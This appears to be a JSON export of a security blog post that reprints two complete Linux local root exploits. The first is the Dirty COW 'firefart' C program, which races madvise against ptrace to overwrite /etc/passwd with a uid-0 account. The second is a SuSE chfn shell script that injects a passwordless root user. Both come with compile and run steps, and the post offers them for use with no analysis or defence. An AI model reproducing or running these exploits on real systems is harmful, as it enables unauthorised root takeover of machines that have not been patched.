\/\/
\n\/\/ This exploit uses the pokemon exploit of the dirtycow vulnerability
\n\/\/ as a base and automatically generates a new passwd line.
\n\/\/ The user will be prompted for the new password when the binary is run.
\n\/\/ The original \/etc\/passwd file is then backed up to \/tmp\/passwd.bak
\n\/\/ and overwrites the root account with the generated line.
\n\/\/ After running the exploit you should be able to login with the newly
\n\/\/ created user.
\n\/\/
\n\/\/ To use this exploit modify the user values according to your needs.
\n\/\/ The default is \"firefart\".
\n\/\/
\n\/\/ Original exploit (dirtycow's ptrace_pokedata \"pokemon\" method):
\n\/\/ https:\/\/github.com\/dirtycow\/dirtycow.github.io\/blob\/master\/pokemon.c
\n\/\/
\n\/\/ Compile with:
\n\/\/ gcc -pthread dirty.c -o dirty -lcrypt
\n\/\/
\n\/\/ Then run the newly create binary by either doing:
\n\/\/ \".\/dirty\" or \".\/dirty my-new-password\"
\n\/\/
\n\/\/ Afterwards, you can either \"su firefart\" or \"ssh firefart@...\"
\n\/\/
\n\/\/ DON'T FORGET TO RESTORE YOUR \/etc\/passwd AFTER RUNNING THE EXPLOIT!
\n\/\/ mv \/tmp\/passwd.bak \/etc\/passwd
\n\/\/
\n\/\/ Exploit adopted by Christian \"FireFart\" Mehlmauer
\n\/\/ https:\/\/firefart.at
\n\/\/<\/p>\n
#include <fcntl.h>
\n#include <pthread.h>
\n#include <string.h>
\n#include <stdio.h>
\n#include <stdint.h>
\n#include <sys\/mman.h>
\n#include <sys\/types.h>
\n#include <sys\/stat.h>
\n#include <sys\/wait.h>
\n#include <sys\/ptrace.h>
\n#include <stdlib.h>
\n#include <unistd.h>
\n#include <crypt.h><\/p>\n
const char *filename = \"\/etc\/passwd\";
\nconst char *backup_filename = \"\/tmp\/passwd.bak\";
\nconst char *salt = \"firefart\";<\/p>\n
int f;
\nvoid *map;
\npid_t pid;
\npthread_t pth;
\nstruct stat st;<\/p>\n
struct Userinfo {
\nchar *username;
\nchar *hash;
\nint user_id;
\nint group_id;
\nchar *info;
\nchar *home_dir;
\nchar *shell;
\n};<\/p>\n
char *generate_password_hash(char *plaintext_pw) {
\nreturn crypt(plaintext_pw, salt);
\n}<\/p>\n
char *generate_passwd_line(struct Userinfo u) {
\nconst char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";
\nint size = snprintf(NULL, 0, format, u.username, u.hash,
\nu.user_id, u.group_id, u.info, u.home_dir, u.shell);
\nchar *ret = malloc(size + 1);
\nsprintf(ret, format, u.username, u.hash, u.user_id,
\nu.group_id, u.info, u.home_dir, u.shell);
\nreturn ret;
\n}<\/p>\n
void *madviseThread(void *arg) {
\nint i, c = 0;
\nfor(i = 0; i < 200000000; i++) {
\nc += madvise(map, 100, MADV_DONTNEED);
\n}
\nprintf(\"madvise %d\\n\\n\", c);
\n}<\/p>\n
int copy_file(const char *from, const char *to) {
\n\/\/ check if target file already exists
\nif(access(to, F_OK) != -1) {
\nprintf(\"File %s already exists! Please delete it and run again\\n\",
\nto);
\nreturn -1;
\n}<\/p>\n
char ch;
\nFILE *source, *target;<\/p>\n
source = fopen(from, \"r\");
\nif(source == NULL) {
\nreturn -1;
\n}
\ntarget = fopen(to, \"w\");
\nif(target == NULL) {
\nfclose(source);
\nreturn -1;
\n}<\/p>\n
while((ch = fgetc(source)) != EOF) {
\nfputc(ch, target);
\n}<\/p>\n
printf(\"%s successfully backed up to %s\\n\",
\nfrom, to);<\/p>\n
fclose(source);
\nfclose(target);<\/p>\n
return 0;
\n}<\/p>\n
int main(int argc, char *argv[])
\n{
\n\/\/ backup file
\nint ret = copy_file(filename, backup_filename);
\nif (ret != 0) {
\nexit(ret);
\n}<\/p>\n
struct Userinfo user;
\n\/\/ set values, change as needed
\nuser.username = \"firefart\";
\nuser.user_id = 0;
\nuser.group_id = 0;
\nuser.info = \"pwned\";
\nuser.home_dir = \"\/root\";
\nuser.shell = \"\/bin\/bash\";<\/p>\n
char *plaintext_pw;<\/p>\n
if (argc >= 2) {
\nplaintext_pw = argv[1];
\nprintf(\"Please enter the new password: %s\\n\", plaintext_pw);
\n} else {
\nplaintext_pw = getpass(\"Please enter the new password: \");
\n}<\/p>\n
user.hash = generate_password_hash(plaintext_pw);
\nchar *complete_passwd_line = generate_passwd_line(user);
\nprintf(\"Complete line:\\n%s\\n\", complete_passwd_line);<\/p>\n
f = open(filename, O_RDONLY);
\nfstat(f, &st);
\nmap = mmap(NULL,
\nst.st_size + sizeof(long),
\nPROT_READ,
\nMAP_PRIVATE,
\nf,
\n0);
\nprintf(\"mmap: %lx\\n\",(unsigned long)map);
\npid = fork();
\nif(pid) {
\nwaitpid(pid, NULL, 0);
\nint u, i, o, c = 0;
\nint l=strlen(complete_passwd_line);
\nfor(i = 0; i < 10000\/l; i++) {
\nfor(o = 0; o < l; o++) {
\nfor(u = 0; u < 10000; u++) {
\nc += ptrace(PTRACE_POKETEXT,
\npid,
\nmap + o,
\n*((long*)(complete_passwd_line + o)));
\n}
\n}
\n}
\nprintf(\"ptrace %d\\n\",c);
\n}
\nelse {
\npthread_create(&pth,
\nNULL,
\nmadviseThread,
\nNULL);
\nptrace(PTRACE_TRACEME);
\nkill(getpid(), SIGSTOP);
\npthread_join(pth,NULL);
\n}<\/p>\n
printf(\"Done! Check %s to see if the new user was created.\\n\", filename);
\nprintf(\"You can log in with the username '%s' and the password '%s'.\\n\\n\",
\nuser.username, plaintext_pw);
\nprintf(\"\\nDON'T FORGET TO RESTORE! $ mv %s %s\\n\",
\nbackup_filename, filename);
\nreturn 0;
\n}<\/p>\n
<\/p>\n
\u901a\u8fc7shell\u63d0\u6743chfn<\/p>\n
#!\/bin\/sh
\n#
\n# Exploit for SuSE Linux 9.{1,2,3}\/10.0, Desktop 1.0, UnitedLinux 1.0
\n# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
\n#
\n# by Hunger <susechfn@hunger.hu>
\n#
\n# Advistory:
\n# http:\/\/lists.suse.com\/archive\/suse-security-announce\/2005-Nov\/0002.html
\n#
\n# hunger@suse:~> id
\n# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
\n# hunger@suse:~> .\/susechfn.sh
\n# Type your current password to get root... \ud83d\ude42
\n# Password:
\n# sh-2.05b# id
\n# uid=0(r00t) gid=0(root) groups=0(root)<\/p>\n
if [ X\"$SHELL\" = \"X\" ]; then
\necho \"No SHELL environment, using \/bin\/sh for default.\"
\nexport SHELL=\/bin\/sh
\nfi<\/p>\n
if [ -u \/usr\/bin\/chfn ]; then
\n\/bin\/echo \"Type your current password to get root... :)\"
\n\/usr\/bin\/chfn -h \"`echo -e ':\/:'$SHELL'\\nr00t::0:0:'`\" $USER > \/dev\/null
\nif [ -u \/bin\/su ]; then
\n\/bin\/su r00t
\n\/bin\/echo \"You can get root again with 'su r00t'\"
\nelse
\necho \"\/bin\/su file is not setuid root :(\"
\nfi
\nelse
\necho \"\/usr\/bin\/chfn file is not setuid root :(\"
\nfi<\/p>\n
# byy3.com [2020-11-08]<\/p>\n","protected":false},"excerpt":{"rendered":"
\/\/ \/\/ This exploit uses the pokemon exploit of the dirt […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[146,545],"class_list":["post-1017","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-linux","tag-545"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1017","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1017"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1017\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1017"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1017"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1017"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}